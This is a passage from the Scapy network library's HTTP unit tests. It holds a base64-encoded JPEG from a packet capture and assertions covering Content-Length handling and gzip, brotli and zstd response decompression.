tjFLeFWxiq4YUuGKt4VXDFLeFW8KtjFLeFWxireFWxhS3irYwquxS2MKt4VbGKt4VbGFLeKrkVmIVRViaADqScIV6Z5d0hdM05I2H+kSfHO3+Ue3+x6Z0OlweHCuvVz8cOEJnmS2OxV2KuxV2KuxV2KuxV2KuxV2KuxV2Ksavrf6vdPGBROqf6p6U+XTOX12Hw8hHQ7u108+KKHzDb3Yq1gVxwJawK44FaxS0cCtYFdgS1irWBLsCtYEtHFXYEtYFdgVrArsCWjgVrArWBLsVawJaOBWsCXYFawJdgVrIpaxV2RVrAl2BVuBXYEtYFdgSx/zHa8ZUuVGz/A/zHT8Mz9JPYxeZ7d09SGQddj+PxySYZmvPt4q2MKW8Vbwq2MUt4VbGKrhhS4Yq3hVcMUt4Vbwq2MUt4VbGKt4VbGFLeKtjCq7FLYwq3hVsYq3hVsYUt4qyjyVo3r3J1CZf3MBpCD3k8f9j+vNloMHEeM8g5GCFm2c5uXLdirsVdirsVdirsVdirsVdirsVdirsVdiqWa5b8olnHVDxfp9lun4/rzWdqYeKHEOcXK0s6lXekuc87J2KtYFccCWsCuOBWsUtHArWBXYEtYq1gS7ArWBLRxV2BLWBXYFawK7Alo4FawK1gS7FWsCWjgVrAl2BWsCXYFayKWsVdkVawJdgVbgV2BLWBXYEobULYXNpJF+0RVP9YbjJ4p8MgXF1un8XEY9envYfQgkHYjNy8IQ3ihsYUt4q3hVsYpbwq2MVXDClwxVvCq4Ypbwq3hVsYpbwq2MVbwq2MKW8VbGFV2KWxhVvCrYxVvCrYwpRNhZTXt5Fawj45TSvYDuT8hlmLGZyER1ZRjZp6nZWcNnaRW0IpHEvEe/iT8zvnSY4CEQB0dhGNClbJpdirsVdirsVdirsVdirsVdirsVdirsVdiq2WNZYnjb7Lgqadd9sjOIkCDyKQaNsWdGjdkf7SEq1OlQaZyOXGYSMT0dzCXEAVuVsmsCuOBLWBXHArWKWjgVrArsCWsVawJdgVrAlo4q7AlrArsCtYFdgS0cCtYFawJdirWBLRwK1gS7ArWBLsCtZFLWKuyKtYEuwKtwK7AlrArsCWsBVi2s2voXzECiS/GvzPX8c2umycUPc8Z2tp/DzGuUt/1oHMh1jYwpbxVvCrYxS3hVsYquGFLhireFVwxS3hVvCrYxS3hVsYq3hVsYUt4q2MKrsUtjCreFWxireFWxhSzzyVo31a1N/MtJrgfugeqx/wDN2brs/Bwx4jzP3OZghQtk2bFvdirsVdirsVdirsVdirsVdirsVdirsVdirsVdiqSa3b8LhZgPhlFGP+Uu34j9WaLtXDUhPv2c/Rz2MUtzUOa1gVxwJawK44FaxS0cCtYFdgS1irWBLsCtYEtHFXYEtYFdgVrArsCWjgVrArWBLsVawJaOBWsCXYFawJdgVrIpaxV2RVrAl2BVuBXYEtYFdgS1gKpbrtt6tn6gHxwnl/se/wDXMjSZOGVd7qe2dPx4eIc4b/DqxrNq8e2MKW8Vbwq2MUt4VbGKrhhS4Yq3hVcMUt4Vbwq2MUt4VbGKt4VbGFLeKtjCq7FLYwq3hVsYq3hVN/LWjnU9RVGH+jRUec+3Zf8AZZlaTB4k/Ic23FDiL0wAKAAKAbADoBnROe7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYqhtRtvrFo6AVcfFH0ryHhXx6Zj6rD4mMxbMU+GQLGs5Mu4dgVxwJawK44FaxS0cCtYFdgS1irWBLsCtYEtHFXYEtYFdgVrArsCWjgVrArWBLsVawJaOBWsCXYFawJdgVrIpaxV2RVrAl2BVuBXYEtYFdgS1gKrWUMpVhVSKEexwXSJRBFFh93bm3uZIT+wdj4jqPwzd458UQXgtVgOLIYHoVMZY0N4q3hVsYpbwq2MVXDClwxVvCq4Ypbwq3hVsYpbwq2MVbwq2MKW8VbGFV2KWxhVvCrYxVciszBVBZmNFA3JJwgWl6f5e0hdM05ISB67/ABzt/lHt8h0zo9Lg8OFdern44cITPMlsdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirG9St/QvHUfZb41+Tf21zmO0MPBlPcd3aaafFH3IXMFyHHAlrArjgVrFLRwK1gV2BLWKtYEuwK1gS0cVdgS1gV2BWsCuwJaOBWsCtYEuxVrAlo4FawJdgVrAl2BWsilrFXZFWsCXYFW4FdgS1gV2BLWAq1gSkfmG2/u7lR/kP+sZn6LJzi8529p+WQe4/oSYZsHnG8Vbwq2MUt4VbGKrhhS4Yq3hVcMUt4Vbwq2MUt4VbGKt4VbGFLeKtjCq7FLYwq3hVsYqyvyRovr3B1GZf3UBpAD3k8f9j+vNn2fp7PGeQ5OTghe7Oc3TluxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KpdrduXt1lHWI79fstsenvTNd2nh48d9YuTpZ1Ku9Is5t2bjgS1gVxwK1ilo4FawK7AlrFWsCXYFawJaOKuwJawK7ArWBXYEtHArWBWsCXYq1gS0cCtYEuwK1gS7ArWRS1irsirWBLsCrcCuwJawK7AlrAVawJULu3FxbSQn9obHwPUfjksc+GQLRqsAy4zA9WJFSpKkUI2I983oLwJBBouxQ3hVsYpbwq2MVXDClwxVvCq4Ypbwq3hVsYpbwq2MVbwq2MKW8VbGFV2KWxhVvCqJ02xmvr2K1h+3KaV7AdST8hlmLGZyER1ZRjZp6tZWkNnaxW0IpHEoVfE+JPuc6bHAQiAOjsYxoUrZNLsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirToroyMKqwIYeIOxwEAiioLFZomhleJvtISCelff6euchnxHHMx7nc458UQVhylsawK44FaxS0cCtYFdgS1irWBLsCtYEtHFXYEtYFdgVrArsCWjgVrArWBLsVawJaOBWsCXYFawJdgVrIpaxV2RVrAl2BVuBXYEtYFdgS1gKtYEtYFY5rdt6V4ZAPgmHIfPvm20eTihXc8f2zp/DzcQ5T3+PVL8ynUt4VbGKW8KtjFVwwpcMVbwquGKW8Kt4VbGKW8KtjFW8KtjClvFWxhVdilsYVbwqz/AMk6L9VszfTLSe5H7sHqsXUf8F1+7N52fp+GPEeZ+5zcEKFsmzYt7sVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdiqS67b8ZUuANn+B+n2huPfcfqzSdrYeUx7i52jnzilZzSOe1gVxwK1ilo4FawK7AlrFWsCXYFawJaOKuwJawK7ArWBXYEtHArWBWsCXYq1gS0cCtYEuwK1gS7ArWRS1irsirWBLsCrcCuwJawK7AlrAVawJawKgdYtvWs2IHxxfGPkOv4ZkaXJwz97rO1tP4mEkc47/AK2NZuHjG8KtjFLeFWxiq4YUuGKt4VXDFLeFW8KtjFLeFWxireFWxhS3irYwquxS2MKpx5X0Y6nqKq4/0WGjznxHZf8AZZl6PT+JPfkObZihxF6cAAKDYDoM6N2DsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVUL23+sWskX7RFU7fENxlOoxeJAx72eOfDIFjBzkCK2LuQbayKXHArWKWjgVrArsCWsVawJdgVrAlo4q7AlrArsCtYFdgS0cCtYFawJdirWBLRwK1gS7ArWBLsCtZFLWKuyKtYEuwKtwK7AlrArsCWsBVrAlrArRAIoemBaYpe25t7qSL9kGq/wCqdxm8w5OOILwet0/g5ZR6dPco5c4rYxS3hVsYquGFLhireFVwxS3hVvCrYxS3hVsYq3hVsYUt4q2MKrsUro0d3VEBZ2ICqNySdgBkgLV6l5e0hNL01ICB67/HOw7ue3yHTOl0uDw4V16uwxw4RSZ5kNjsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirHdWtzDeMQPgk+NTv1P2hU++c12nh4MljlJ2mlnca7kFmtclxwK1ilo4FawK7AlrFWsCXYFawJaOKuwJawK7ArWBXYEtHArWBWsCXYq1gS0cCtYEuwK1gS7ArWRS1irsirWBLsCrcCuwJawK7AlrAVawJawK7AqT6/bVRLgDdfhf5Hp+OZ+hybmLoO3dPcRkHTY/o/HmkubN5hsYpbwq2MVXDClwxVvCq4Ypbwq3hVsYpbwq2MVbwq2MKW8VbGFV2KWW+RdF9ac6nMv7uE8bcHu/dv9j+v5ZteztPZ4z05OTgx2bZ1m6ct2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KoDWrf1LT1APjh+Kv+Sftf1+jMDtHDx4jXOO7kaafDP3sfzl3auOBWsUtHArWBXYEtYq1gS7ArWBLRxV2BLWBXYFawK7Alo4FawK1gS7FWsCWjgVrAl2BWsCXYFayKWsVdkVawJdgVbgV2BLWBXYEtYCrWBLWBXYFUriFZoXibo4phhPhkD3NefCMkDA9QxN0ZHZGFGUkEe4zoImxYeAnAxJieYcMLFvCrYxVcMKXDFW8KrhilvCreFWxilvCrYxVvCrYwpbxVsYVRemafNqF9FaQ/akNC3ZV7sfkMtw4jOQiGcI2aesWdpDaWsVtAOMUShVH8T7nOnxwEYiI5B2MRQpWyaXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq5lDKVYVUihB6EHEhWK3MBguJITvwNAe9OoJp7Zx+qw+HkMXc4p8UQVI5jtjWKWjgVrArsCWsVawJdgVrAlo4q7AlrArsCtYFdgS0cCtYFawJdirWBLRwK1gS7ArWBLsCtZFLWKuyKtYEuwKtwK7AlrArsCWsBVrAlrArsCtZEpSDW7f07kSgfDKN/wDWHXNvoclxrueS7b0/Bl4xyl96XDM10zeFWxiq4YUuGKt4VXDFLeFW8KtjFLeFWxireFWxhS3irYwq9E8k6J9Tsvrsy0uLofCD1WPqP+C6/dm+7P0/BHiPM/c52DHQtkubFvdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdiqT69b7x3A/4xv+tf45pu18NgTHTYubo57mKUHNA7BrFLRwK1gV2BLWKtYEuwK1gS0cVdgS1gV2BWsCuwJaOBWsCtYEuxVrAlo4FawJdgVrAl2BWsilrFXZFWsCXYFW4FdgS1gV2BLWAq1gS1gV2BWsiUoPVLf17NwBV0+NfmP7Mv0uTgmO4uv7T0/i4SBzG4Y2M3rxLeFWxiq4YUuGKt4VXDFLeFW8KtjFLeFWxireFWxhS3iqd+VNFOp6kokFbWCjznsf5U/wBl+rMzRafxJ7/SObbhhxHyengACg6Z0jsHYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FVK7gFxbyQn9obE9iNwdvfK82MTgYnqyhLhILFWDAkMCrDYqeoOcbKJiSD0d1E2LayLJo4FawK7AlrFWsCXYFawJaOKuwJawK7ArWBXYEtHArWBWsCXYq1gS0cCtYEuwK1gS7ArWRS1irsirWBLsCrcCuwJawK7AlrAVawJawK7ArWRKWsCsZ1C39C7dAKKfiT5HN9psnHAF4btDT+FmMenMe4ofMhwmxiq4YUuGKt4VXDFLeFW8KtjFLeFWxireFWxhSvjjeSRY41LO5Cqo6knYAYQCTQUPVvL2jppWmx2+xmb452Hdz1+gdBnT6XB4cK69XY44cIpMsyGx2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2Kse1m39K7LgUSYch0Hxftf1+nOb7Vw8OTi6SdlpJ3Gu5AZq3MaOBWsCuwJaxVrAl2BWsCWjirsCWsCuwK1gV2BLRwK1gVrAl2KtYEtHArWBLsCtYEuwK1kUtYq7Iq1gS7Aq3ArsCWsCuwJawFWsCWsCuwK1kSlrAqWa5b8oVmHWM0b5H+3M/QZKkY97o+3NPxQGQfw/cUkzbvKtjFVwwpcMVbwquGKW8Kt4VbGKW8KtjFW8KtjClmPkPRPVmbVJ1/dxErbg937t/sen+1m17N09njPTk5Onx9WdZu3MdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVQWsW/rWbMB8cXxj5D7X4Zha/B4mI943b9PPhmGOZyjt2jgVrArsCWsVawJdgVrAlo4q7AlrArsCtYFdgS0cCtYFawJdirWBLRwK1gS7ArWBLsCtZFLWKuyKtYEuwKtwK7AlrArsCWsBVrAlrArsCtZEpawKtljWSNo2+ywIP04YSMSCOjDLjE4mJ5EMWkjaORo2+0pIP0Z0cJCQBHV4DLjMJGJ5grRkmtcMKXDFW8KrhilvCreFWxilvCrYxVvCqM0rTptRv4rSH7Uh+JuyqN2Y/IZbhxHJIRDOEeI09btLWG0toraBeMUShVHy/ic6mEBGIA5B2URQpVyaXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYqxu60u6hkfhGXiqeDL8Xw9q985fVaDJGZ4Y3Hydrh1ESBZ3QTAgkEUI6g5riK5uSGsCuwJaxVrAl2BWsCWjirsCWsCuwK1gV2BLRwK1gVrAl2KtYEtHArWBLsCtYEuwK1kUtYq7Iq1gS7Aq3ArsCWsCuwJawFWsCWsCuwK1kSlrArsCUk1u34zLMBs4o3zH9mbfs/LcTHueV7c0/DMZB/F94/YlozYOiXDClwxVvCq4Ypbwq3hVsYpbwq2MVbwq9H8kaH9SsPrky0uboAivVY+qj/ZdT9GdB2fp+CPEecvuc/BjoX3slzYt7sVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVWSQwyikiK4/wAoA5CeKM/qALKMyORQcuiWL/ZBjP8Akn+BrmBk7Kwy5en3N8dXMeaCm8vTDeKVW9mHE/xzAydjSH0yB97kR1o6hBTabfRfahYjxX4h+Ga/Loc0OcT97kxzwlyKEIIND1zELc7ArWBLRxV2BLWBXYFawK7Alo4FawK1gS7FWsCWjgVrAl2BWsCXYFayKWsVdkVawJdgVbgV2BLWBXYEtYCrWBLWBXYFayJS1gV2BKGv7f17V0AqwHJPmMu02XgmC4XaGn8XCY9eY97GxnQvDLhhVwxVvCq4Ypbwq3hVsYpbwq2MVT3ylon6U1IGRa2lvR5/A/yp/sv1ZnaHT+JPf6RzbsOPiPk9QzpHYOxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KqctvBMP3sav7kAnKsmGE/qALOM5R5FBTaDZP9jlEfY1H41zAy9kYZcrj+PNyI6yY57oGby7cLvFIrjwPwn+Oa/L2LMfSQfsciOuieYpAzadew/bhag7gch94rmuy6LNDnEuTDPCXIobMVtawJdgVrArsCWjgVrArWBLsVawJaOBWsCXYFawJdgVrIpaxV2RVrAl2BVuBXYEtYFdgS1gKtYEtYFdgVrIlLWBXYEtHArHtRt/Ru3A+y/wAS/T/bm/0mXjgO8bPE9qafwsxHQ7hDDMp17hireFVwxS3hVvCrYxS3hVfDFJLIkUal5HYKijqSTQDDEEmgmreteX9Hj0rTY7YUMp+Odx3c9foHQZ1OlwDFADr1djjhwikxzIbHYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FVKa0tZv72JWPiRv8Af1ynJpsc/qiCzjllHkUDN5fsn3jLRHwBqPx3/HNdl7GxS+m4uTDWzHPdATeXbtf7p1kHh9k/jt+Oa7L2LkH0kS+z8fNyYa6J5ikBNYXkP97CyjxpUfeNs12XSZcf1RIcmGaEuRUMxW1o4FawK1gS7FWsCWjgVrAl2BWsCXYFayKWsVdkVawJdgVbgV2BLWBXYEtYCrWBLWBXYFayJS1gV2BLRwKl+sQc7cSAfFGd/keuZ3Z+Xhnw97pu29Px4uMc4/ckozdvJOGKt4VXDFLeFW8KtjFLeFWZ+QND9SRtVnX4IyUtge7dGb6Ogzb9maaz4h+DlafH/EzvN25jsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVUJrGzm/vYVYnvSh+8b5jZdJiyfVEFshmnHkUBN5ctH3idoz4faH47/jmuy9h4j9JMft/HzcmGukOYtATeXb1N4yso7AHifx2/HNbl7EzR+mpfZ+Pm5UNdA89kvns7uCvqxMg8SNvv6ZrculyY/qiQ5MMsZcio5jtjWBLRwK1gS7ArWBLsCtZFLWKuyKtYEuwKtwK7AlrArsCWsBVrAlrArsCtZEpawK7Alo4FWuqupVhVWFCPY4iRBsMZwEgQeRY1NE0UrxnqppnS45icRIdXgc+E45mB6FYMsaW8KrhilvCreFWxilG6Rpk+pahFZw9ZD8bdlUfaY/IZdgwnJMRDOEeI09dtLWG1to7aBeMUShUHsM6uEBEADkHZAUKVckl2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KoafTbGf+8hUk/tAcT94pmJl0OHJ9UR933N0M848igJ/LNs28MjRnwPxD+BzW5ewcZ+mRj9rkw18hzFpfP5c1CPePjKP8k0P3GmazN2Jnj9NS/Hm5UNdA89kumtbmA/vYmT3YED781mXT5Mf1RIcqGSMuRtSyhm1gS7ArWRS1irsirWBLsCrcCuwJawK7AlrAVawJawK7ArWRKWsCuwJaOBWsBVKdZgo6zAbN8LfMdM23ZuWwYvNdu6epDIOux/QlgzaPPN4VXDFLeFW8KtjFL0ryRof1DT/rcy0ursBqHqsfVV+nqc6Ls7TcEOI/VL7nPwY6F97Jc2Le7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXEAih6YqhJ9J06b7cCgnuvwn/haZhZezsGTnEfDb7m+GpyR5FL5/K0DVMEzJ7MAw/CmavL7PwP0SI9+/6nKh2jLqEun8u6lHUoqyj/ACDv9xpmrzdiaiHICXu/a5UNdjPPZL5re4hNJo2jP+UCP15q8uCeM1IEe9yozjLkbUsqZuyKtYEuwKtwK7AlrArsCWsBVrAlrArsCtZEpawK7Alo4FawFVG7hE0Dx9yPh+Y6Zbp8vBMScbWafxcRj16e9jtCDQ9c6V4Ih2FVwxS3hVvCqfeT9D/SepBpVraW1Hmr0Y/sp9P6szdBpvEnv9Ib8OPiPk9SzpnYOxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuKhgQwBB6g4CARRUFBT6Lps32oFU+KfD+rMDN2Vp8nOIHu2+5yIarJHql0/lWI1ME5XwVwD+IpmqzezsT9EiPe5UO0T/EEun8u6nFUhBKPFDX8DQ5qs3YmohyHF7nLhrsZ60l8sM0TcZUZG8GBH681eTFOBqQIPm5UZiXI2pZUydgS1gV2BLWAq1gS1gV2BWsiUtYFdgS0cCtYCrWRSkepweldEgfDJ8Q+ffOg0OXjxjvGzxna+n8PMSOUt/wBaEzNdWuGKW8Kr4YpJpUiiUvJIwVFHUkmgGSjEk0EgW9d0DSI9K0yK1Whk+1O4/ac9T/AZ1WmwDFAR+bs8cOEUmOZDN2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxVp0R14uoZT1BFRkZREhRFhIJHJA3GhaXNuYQjeMfw/gNvwzXZux9Nk/ho+W37HJhrMket+9LbjykOtvPTwWQV/Ef0zU5vZof5Ofz/AFj9TlQ7S/nD5JbceXtUh39L1FHeM8vw6/hmpz9i6nH/AA8Q8t/2/Y5kNbjl1r3pfJFJG3GRCjeDAg/jmryY5RNSBB83JjIHksyssmsCWsCuwK1kSlrArsCWjgVrAVayKUHqkHqWxYfaj+L6O+Z3Z+XhyV0k6ntnT+Jh4hzhv8OqSZv3jlwxS3hVm35faFzdtWnX4UqlqD3boz/R0H05uey9Nf7w/By9Nj/iLO83bmOxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxVbJFHIvGRA6/wArAEfjkJ44zFSAI80xkRyS+48u6VNU+l6bHvGafhuPwzWZuxNNk/h4fdt+z7HKhrsset+9Lbjyg25t7gHwWQU/4Yf0zT5/Zg/5Ofz/AFj9Tlw7T/nD5JXcaBqsNawF1H7UfxfgN/wzUZ+xdTj/AIbHlv8AtcyGtxS6170A6OjFXUqw6gihzVzgYmiKLlAg8luQKWsCuwJaOBWsBVrIpaIBBB3B6jG6NoIBFFj1xCYZnjP7J2+XbOowZOOAl3vA6rAcWSUO4rBlrQjtF0ubVNRis4tuZrI/8qD7TZfp8JyTEQzxw4jT1+1tobW3jt4V4xRKERfYZ1kICIAHIOzAoUq5JLsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVWSwQTLxljWRfBgD+vK8mGGQVICXvFsozMeRpLbjyzpU1SsZhY94zT8DUZqc/YGmycgYnyP67Dlw1+WPW/ellx5PlFTb3Ct4K4K/iK5p8/svIf3cwfft+ty4dqD+IJZcaFqsFS1uzL/Mnx/wDEanNNn7H1WPnAn3b/AHOZDWYpcigGUqSGFCOoOawgjYuUCtyJVrIpdgKpZrEH2Jh/qt/DNt2Xm5wPvec7e0/LIPcf0JaM3Dzj07yPoX6P0761MtLu7AY16rH1Vfp6nOk7O03hw4j9Uvuc/T4+EX1LJM2LkOxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KqU9rbTik0SSD/AClB/XlObT48gqcRL3hnDJKPI0ltx5W0qWpRWhb/ACDt9zVzT5/ZzTT5Aw9x/Xblw7Ryx57pXc+Trlam3nWQeDgqfw5Zps/srkH93MS9+363Nx9qRP1CkqudE1S3qZLdyo/aT4x/wtc0mo7I1OL6oGvLf7nMx6vHLlJLrmESxPE21RT5HMLDkOOYl3J1OEZcZh3j+xryboB1LVOc6/6LaENMD0Zq/Cn9fbO47O0/iyv+EPD4sJMqPR6lnTuwdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdirsVdiqDvl0hvhvfQqenqlQfoJ3zX6yOlO2bg/zq/S34TlH0cXwdpUOlRQOummMw+oxkMTBx6hpWpqd+mXaSGKMKxVweRv7WmRuRJ53v70ZmUh2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2KuxV2Kv/9k=' -assert a[29].load == base64_bytes(wireshark_data) - -# This a valid JPEG image: try it out -# open("image.jpg", "wb").write(a[29].load) - -= TCPSession - dissect HTTP 1.0 html page with Content_Length -~ http - -load_layer("http") - -import os - -# Packet from -# https://community.cisco.com/t5/networking-documents/http-packet-captures/ta-p/3121453 -tmp = "/test/pcaps/http_content_length.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -expected_data = b"""Google
A faster way to browse the web



 
  Advanced Search
  Language Tools


Advertising Programs - Business Solutions - About Google

©2010 - Privacy
""" - - -conf.contribs["http"]["auto_compression"] = False -a = sniff(offline=filename, session=TCPSession) -pkt = a[7] -assert HTTP in pkt -assert HTTPResponse in pkt -assert pkt[HTTP].Content_Length == b'5012' -assert len(pkt[Raw].load) == 5012 - -conf.contribs["http"]["auto_compression"] = True -a = sniff(offline=filename, session=TCPSession) -pkt = a[7] -assert HTTP in pkt -assert HTTPResponse in pkt -print(pkt[Raw].load, expected_data) -assert pkt[Raw].load == expected_data - -############ -############ -+ HTTP 1.0 -~ http - -= HTTP decompression (gzip) - -conf.debug_dissector = True -load_layer("http") - -import os -import gzip - -tmp = "/test/pcaps/http_compressed.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -# First without auto decompression - -conf.contribs["http"]["auto_compression"] = False -pkts = sniff(offline=filename, session=TCPSession) - -data = b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xffEQ]o\xdb0\x0c\xfc+\x9a\x1f\x92\xa7\x9a\x96?\xe4\xb8\x892`I\x81\r\xe8\xda\xa2p1\xec\xa9P-\xd5\x16*[\x86\xa5\xd8K\x7f\xfd\xa8\x14E\x1f\x8e:R\x07\xf2D\xed\xbe\x1d\xef\x0f\xf5\xdf\x87\x1b\xd2\xf9\xde\x90\x87\xa7\x1f\xb7\xbf\x0e$\xba\x02\xf8\x93\x1d\x00\x8e\xf5\x91\xfc\xac\x7f\xdf\x92\xe5?9\x89QV\x01\x02\x00\x00' - -pkts[2].show() -assert HTTPResponse in pkts[2] -assert pkts[2].Expires == b'Mon, 22 Apr 2019 15:23:19 GMT' -assert pkts[2].Content_Type == b'text/html; charset=UTF-8' -assert pkts[2].load == data - -# Now with auto decompression - -conf.contribs["http"]["auto_compression"] = True -pkts = sniff(offline=filename, session=TCPSession) - -pkts[2].show() -assert HTTPResponse in pkts[2] -assert pkts[2].load == b'' - -= HTTP decompression (brotli) -~ brotli - -conf.debug_dissector = True -load_layer("http") - -import os -import brotli - -tmp = "/test/pcaps/http_compressed-brotli.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -# First without auto decompression - -conf.contribs["http"]["auto_compression"] = False -pkts = sniff(offline=filename, session=TCPSession) - -data = b'\x1f\x41\x00\xe0\xc5\x6d\xec\x77\x56\xf7\xb5\x8b\x1c\x52\x10\x48\xe0\x90\x03\xf6\x6f\x97\x30\xd0\x40\x24\xb8\x01\x9b\xdb\xa0\xf4\x5c\x92\x4c\xc4\x6f\x89\x58\xf7\x4b\xf7\x4b\x6f\x8c\x2e\x2c\x28\x64\x06\x1d\x03' - -pkts[0].show() -assert HTTPResponse in pkts[0] -assert pkts[0].Content_Encoding == b'br' -assert pkts[0].Content_Type == b'text/plain' -assert pkts[0].load == data - -# Now with auto decompression - -conf.contribs["http"]["auto_compression"] = True -pkts = sniff(offline=filename, session=TCPSession) - -pkts[0].show() -assert HTTPResponse in pkts[0] -assert pkts[0].load == b'This is a test file for testing brotli decompression in Wireshark\n' - -= HTTP decompression (zstd) -~ zstd - -conf.debug_dissector = True -load_layer("http") - -import os -import zstandard - -# sample server: $ socat -v TCP-LISTEN:8080,fork,reuseaddr SYSTEM:'(echo -ne "HTTP/1.1 200 OK\r\nContent-Encoding: zstd\r\n\r\n") > tmp && dd bs=1G count=1 status=none | zstd --stdout >> tmp && cat tmp' -# sample client: $ curl -v localhost:8080/tmp_echo_zstd_request_for_testing -o a.html -tmp = "/test/pcaps/http_compressed-zstd.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -# First without auto decompression - -conf.contribs["http"]["auto_compression"] = False -pkts = sniff(offline=filename) - -data = b'\x28\xb5\x2f\xfd\x04\x58\x45\x03\x00\xf2\x06\x19\x1c\x70\x89\x1b\xf6\x4f\x21\x1a\xbb\x28\xda\x9a\x1c\x34\xb8\x68\x1f\xd2\x82\xd7\x01\x8d\x36\xe5\x57\x1d\x0f\x38\x10\xa9\xa9\x86\x32\x96\x3d\xd4\xce\x2d\xa9\x2b\x01\x92\x94\xa8\x17\x23\xb7\xec\x9f\x6e\x96\x23\xb6\x13\x52\x97\xb2\x14\xf6\x0e\x9d\x57\x70\xf0\x2d\x7b\x87\x4c\x2a\x92\x10\x35\x68\x8d\xd9\xe6\x41\xbc\xf7\x73\x84\x07\x7e\xef\x48\xd1\x91\x0d\xef\x0b\x86\x8e\x6b\x86\x12\xaf\xb6\x05\x04\x01\x00\x29\x52\xd2\xfa' - -pkts[0].show() -assert HTTPResponse in pkts[0] -assert pkts[0].Content_Encoding == b'zstd' -assert pkts[0].load == data - -# Now with auto decompression - -conf.contribs["http"]["auto_compression"] = True -pkts = sniff(offline=filename) - -pkts[0].show() -assert HTTPResponse in pkts[0] -assert b'tmp_echo_zstd_request_for_testing' in pkts[0].load - -= HTTP PSH bug fix - -tmp = "/test/pcaps/http_tcp_psh.pcap.gz" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -pkts = sniff(offline=filename, session=TCPSession) - -assert len(pkts) == 15 -# Verify 